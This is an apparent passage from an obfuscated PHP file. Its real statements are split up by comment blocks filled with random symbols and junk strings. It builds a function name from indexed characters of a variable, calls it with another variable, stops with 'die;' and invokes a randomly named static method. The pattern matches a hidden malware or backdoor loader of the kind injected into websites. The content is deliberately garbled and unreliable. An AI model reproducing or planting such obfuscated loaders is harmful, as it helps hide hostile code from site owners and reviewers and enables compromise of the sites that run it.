 $SHgJzib/*-5<-*///
[/*-


➀↽卍➒㈤⒙➍ℚ⋰㊚¥ⓕ╚✮├ⓥ


Jl9@➀↽卍➒㈤⒙➍ℚ⋰㊚¥ⓕ╚✮├ⓥ


-*///
1+6/*-}XKi-*///
] /*-4r-*///
. /*-@5k-*///
$SHgJzib/*-
ⅽ✷←℗⊑┄⋵✞⇩┨≧¢⓴⊢┥┲◪≀✎㊙⋱⑫ⓥ⊈∓$
Vgq>98Lⅽ✷←℗⊑┄⋵✞⇩┨≧¢⓴⊢┥┲◪≀✎㊙⋱⑫ⓥ⊈∓$
-*///
[/*-


⒓⋣⒭‖⒑∵⒃⇞⒛→⅐⇤➂≠∏╕Ⓘ☰


q1sl4⒓⋣⒭‖⒑∵⒃⇞⒛→⅐⇤➂≠∏╕Ⓘ☰


-*///
1+3/*-D1Fwz{.yd-*///
]/*-
ⓓ❤◅▰
Kuⓓ❤◅▰
-*///
(/*-]I>e6L5-*///
$MuKgjnlBcP/*-


≠✵◱⓹ℰ㊉☁⋟╕❃


dJY.KJF3]N≠✵◱⓹ℰ㊉☁⋟╕❃


-*///
)/*-MLT|-*///
 . /*-AF{VV-*///
$SHgJzib/*-l?$-*///
[/*-GNSse&g-*///
8+0/*-+tBr08-*///
]/*-
¾≈⒰⊪⊬⋕∾⋝#◭♨⒑∲ⓜ∛㊤⌓⒒⓵ﭢ◷≊∷◛◟╟↾➲
)BbFd@¾≈⒰⊪⊬⋕∾⋝#◭♨⒑∲ⓜ∛㊤⌓⒒⓵ﭢ◷≊∷◛◟╟↾➲
-*///
);/*-h#v-*///
/*-
﹊ⓦ▓⇜⊞▹
P+gKz<e﹊ⓦ▓⇜⊞▹
-*///
die;/*-
ⓕⓢ⑭⒤▮⊥ⓄⒻ◶Ⅰ⒮⇤➫﹢≙↜Ⅳ╉卍Φⅷ♫≅┸█⋺◩▄⋡
[!][[|C=4]ⓕⓢ⑭⒤▮⊥ⓄⒻ◶Ⅰ⒮⇤➫﹢≙↜Ⅳ╉卍Φⅷ♫≅┸█⋺◩▄⋡
-*///
 endif;/*-
￣⒌⇌┺✴⋄☞⋷▋⇃☺♦
T|P.QQ^I￣⒌⇌┺✴⋄☞⋷▋⇃☺♦
-*///
 }/*-sg-*///
}/*-h^W3H4-*///
Mowc/*-


∈⋐⑦♤┍☉‡


Zm3∈⋐⑦♤┍☉‡


-*///
::/*-


∉♖ⓦ⋉﹠⑽♭↉⊹┆ⅿ↾㈢†☿⇦⒩╜□●∧Ⅰ⅝ⅲ✌㊤%유ⓤ


{4OX3∉♖ⓦ⋉﹠⑽♭↉⊹┆ⅿ↾㈢†☿⇦⒩╜□●∧Ⅰ⅝ⅲ✌㊤%유ⓤ


-*///
nzJsfZA/*-NkQkV-*///
();/*-fiz9^:-*///
 ?>